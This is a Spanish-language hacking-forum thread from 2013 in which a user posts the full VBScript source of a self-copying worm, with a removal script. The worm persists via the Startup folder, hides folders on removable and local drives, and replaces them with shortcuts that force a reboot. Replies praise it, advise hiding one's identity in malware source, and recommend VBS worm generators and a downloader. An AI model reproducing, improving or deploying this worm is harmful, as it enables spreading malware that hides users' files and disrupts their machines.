Mi version al fin terminada

Iniciado por danny920825, 19 Noviembre 2013, 05:48 AM

0 Miembros y 1 Visitante están viendo este tema.

danny920825

Hola a todos, aki les dejo mi version del famoso virus que convierte las carpetas en acceso directo, intente poner varias cosas que fueran graciosas, pero no las puse al final porque no pasaria desapercibido al usuario  que es un virus. Aqui les dejo el codigo y abajo el codigo de como desinfectarte, recuerden que deben cerrar el proceso wscript.exe para que deje de hacer efecto, porque si no seguira eternamente hasta que apaguen la PC y tambien deben borrarlo de la carpeta INICIO porque si no se ejecuta desde que la PC inicia sesion.

codigo # 1: Script
Citar

'                       Archivo Creado por Danny Paula Gómez.     
'                       Uso Publico siempre y cuando no Modifiquen estas lineas en agradecimiento.


on error resume next

set objfso = createobject("Scripting.FileSystemObject")
set objshell = createobject("wscript.shell")
Set dc = objfso.Drives
dim installname, url, desktop, startup, argumentos

argumentos = "/c shutdown -r -t " & "10"
startup = objshell.specialfolders ("startup") & "\"
installname = wscript.scriptname

while true

For Each d in dc
if d.Isready then
if d.drivetype = 1 then
  if d.freespace > 0 then
         for each folder in objfso.getfolder (d.path & "\").subfolders
         foldername = folder.name
         copia = objfso.copyfile (wscript.scriptfullname, startup, true)
         set lnkobj = objshell.createshortcut (d.path & "\"  & foldername & ".lnk")
         lnkobj.windowstyle = 7
         lnkobj.targetpath = "cmd.exe"
         lnkobj.workingdirectory = ""
         lnkobj.arguments = argumentos
         foldericon = "explorer.exe, 0"
         lnkobj.save()
         folder.attributes = 1+2+4
      Next
      for each file in objfso.getfolder(d.path & "\").files
         if  objfso.fileexists (d.path & "\" & installname)  then
            objfso.getfile(d.path & "\"  & installname).attributes = 2+4
         end if
      Next
  end if
end if
end if
Next

For Each d in dc
if d.Isready then
if d.drivetype = 3 then
  if d.freespace > 0 then
      for each folder in objfso.getfolder (d.path & "\").subfolders
         for each folder in objfso.getfolder (d.path & "\").subfolders
         foldername = folder.name
         copia = objfso.copyfile (wscript.scriptfullname, startup, true)
         set lnkobj = objshell.createshortcut (d.path & "\"  & foldername & ".lnk")
         lnkobj.windowstyle = 7
         lnkobj.targetpath = "cmd.exe"
         lnkobj.workingdirectory = ""
         lnkobj.arguments = argumentos
         foldericon = "explorer.exe, 0"
         lnkobj.save()
         Next
for each file in objfso.getfolder(d.path & "\").files
   if  objfso.fileexists (d.path & "\" & installname)  then
        objfso.getfile(d.path & "\"  & installname).attributes = 2+4
   end if
Next
  end if
end if
end if
desktop = objshell.specialfolders("desktop")
Set url = objshell.createshortcut( desktop & "\f a c e b o o k .url")
url.targetpath = "www.facebook.com/danny920825"
url.save
Next

wend

'                   Agradezco a ||MadAntrax|| por su ayuda   
'                   Y al staff de foro.elhacker.net donde he aprendido lo poco que se.     
'                   Correo: danny920825@gmail.com             
'                   facebook: danny920825                     
                   



'                      .::Este proyecto fue realizado con fines educativos, no
'                           me hago responsable del uso quese le de al mismo ::.

Codigo # 2 :Anti-Script
Citar
on error resume next
set objfso = createobject("Scripting.FileSystemObject")
set objshell = createobject("wscript.shell")
Set dc = objfso.Drives
dim del, reverse, url, desktop, borrar

For Each d in dc
if d.Isready then
if d.drivetype = 1 then
  if d.freespace > 0 then
   for each file in objfso.getfolder (d.path & "\").files
file.attributes = 0
Next
for each folder in objfso.getfolder(d.path & "\").subfolders
foldername = folder.name
reverse = StrReverse(foldername)
folder.attributes = 0
del = objfso.deletefile(d.path & "\" & foldername & ".lnk" )
  Next
  end if
end if
end if
Next

For Each d in dc
if d.Isready then
if d.drivetype = 3 then
  if d.freespace > 0 then
   for each file in objfso.getfolder (d.path & "\").files
file.attributes = 0
Next
for each folder in objfso.getfolder(d.path & "\").subfolders
foldername = folder.name
reverse = StrReverse(foldername)
folder.attributes = 0
del = objfso.deletefile(d.path & "\" & reverse & ".lnk" )
  Next
  end if
end if
end if
desktop = objshell.specialfolders("Desktop")
borrar = objfso.deletefile( desktop & "\f a c e b o o k .url")
Next

PD: Utilizo citas y no codigos porque al parecer tengo algo en el navegador mareado y me sale todo como codigo desde el inicio, me disculpo si les dificulta interpretar el codigo. Diganme si les gusta y por favor, si alguien sabe sobre algun manual que hable sobre los demas objetos y los usos que se les puede dar, que me lo diga. Saludos
"Los que reniegan de Dios es por desesperación de no encontrarlo".
   Miguel de Unamuno

Mad Antrax

Hola

No está mal el código, no es un virus muy complejo pero por algo se empieza :)

Te recomiendo que no pongas tus datos personales en el source de un virus, usa un nick o pseudónimo, además queda más profesional.

Ahora te toca explorar los distintos sources de virus para aprender sus principales rutinas, efectos, payloads, etc... La programación malware bajo VBS es algo que personalmente me apasiona, aunque no la utilizaría para ningún proyecto "profesional". Si tengo tiempo te dejaré algunos códigos (payloads) interesantes :)
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

danny920825

Te agradezco todo lo que estas haciendo por ayudarme, pero me gustaria saber que son los payload porque busque en google y no pude encontrar una definicion ajustada al tema. Y otra cosa, el virus es sencillo porque no podia hacer mucho, trabajo en una PC con Win 7 y siendo un usuario limitado hay muchas cosas que no puedo hacer, por tanto mi objetivo era que pudiese trabajar bajo cualkier limitacion (o casi) y por eso no tiene llaves de registro ni se copia a system32 con backup ni nada. por cierto, baje varios programas que a continuacion listo y quisiera que me dieran una opinion al respecto:
1-Microsoft Visual Basic Script Worm Editor 9
2-Psychology VB Poly Generator
3-Vbsencrypter
4-Vbs_Creator(me pide una DLL que tengo que descargar despues)
5-VBS Worm Generator 2 Beta

Y me gustaria saber donde puedo aprender sobre otros objetos, porque ya veo que no son solo fso, shell y Drive, tambien hay diccionario, etc, pero no se nada acerca de ellos y el uso que le pueda dar a algun virusillo

PD. Puse mi nombre en el source porque como explique era con fines educativos, no era un virus para poner a andar en una pc para expandirlo  :D
"Los que reniegan de Dios es por desesperación de no encontrarlo".
   Miguel de Unamuno

Mad Antrax

Cita de: danny920825 en 22 Noviembre 2013, 21:17 PM
Te agradezco todo lo que estas haciendo por ayudarme, pero me gustaria saber que son los payload porque busque en google y no pude encontrar una definicion ajustada al tema. Y otra cosa, el virus es sencillo porque no podia hacer mucho, trabajo en una PC con Win 7 y siendo un usuario limitado hay muchas cosas que no puedo hacer, por tanto mi objetivo era que pudiese trabajar bajo cualkier limitacion (o casi) y por eso no tiene llaves de registro ni se copia a system32 con backup ni nada. por cierto, baje varios programas que a continuacion listo y quisiera que me dieran una opinion al respecto:
1-Microsoft Visual Basic Script Worm Editor 9
2-Psychology VB Poly Generator
3-Vbsencrypter
4-Vbs_Creator(me pide una DLL que tengo que descargar despues)
5-VBS Worm Generator 2 Beta

Y me gustaria saber donde puedo aprender sobre otros objetos, porque ya veo que no son solo fso, shell y Drive, tambien hay diccionario, etc, pero no se nada acerca de ellos y el uso que le pueda dar a algun virusillo

PD. Puse mi nombre en el source porque como explique era con fines educativos, no era un virus para poner a andar en una pc para expandirlo  :D

El VBS Worm Generator (creado por [K]alamar) es una obra de arte. Con ese programa se creó el virus VBS.Kurnikova (fue generando usando vbswg2 y luego modificado un poco a mano).

Aunque no tengas provilegios, puedes hacer que un gusano se auto-ejecute en un PC o incluso infectar unidades de red, disco local o disco extraible.

Si quieres aprender mejor a usar objetos, yo te recomiendo la web de ss64.com (http://ss64.com/vb/). En esa web explica casi todo sobre VBS, con ejemplos y muy bien documentado. Luego te aconsejo que indagues sobre las llamadas WMI

Scriptomatic de Microsoft (http://www.microsoft.com/en-us/download/details.aspx?id=12028) gran librería, repositorio y ejemplos de WMI.
Repositorio Scripting de Microsoft (http://gallery.technet.microsoft.com/scriptcenter) encontrarás DE TODO si sabes buscar, ejemplo:

http://gallery.technet.microsoft.com/scriptcenter/f9f23891-d8d1-470f-81ef-bc4205db73ea (es un downloader)

Y para terminar; payload es la parte de un virus que genera un efecto. Por ejemplo el payload del virus barrotes era mostrar unas barras en la pantalla:



Saludos.
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

danny920825

ya te entendi lo del payload, sobre las WMI ya habia escuchado en otro script que publique al inicio y creo que tu mismo me lo posteastes, pero el ingles me mata, en ingles estoy mas perdido que Adan y Eva el dia de las Madres. en la web que me diste habia mucha documentacion, pero no he podido entrar mas por falta de una mejoria en la conexion. Ahora voy a postear otro script, pero esta vez es el del virus que esta afectando ahora aqui en La Habana, es parecido a otro que ya se publico, pero quiero que alguien me explique como lo descifro porque esta cifrado. Por cierto, lei en otro foro que para saber si el codigo es un virus o no el anti-virus lo ejecuta en una maq virtual para que se desencripte y asi saber lo que hace, es cierto??
"Los que reniegan de Dios es por desesperación de no encontrarlo".
   Miguel de Unamuno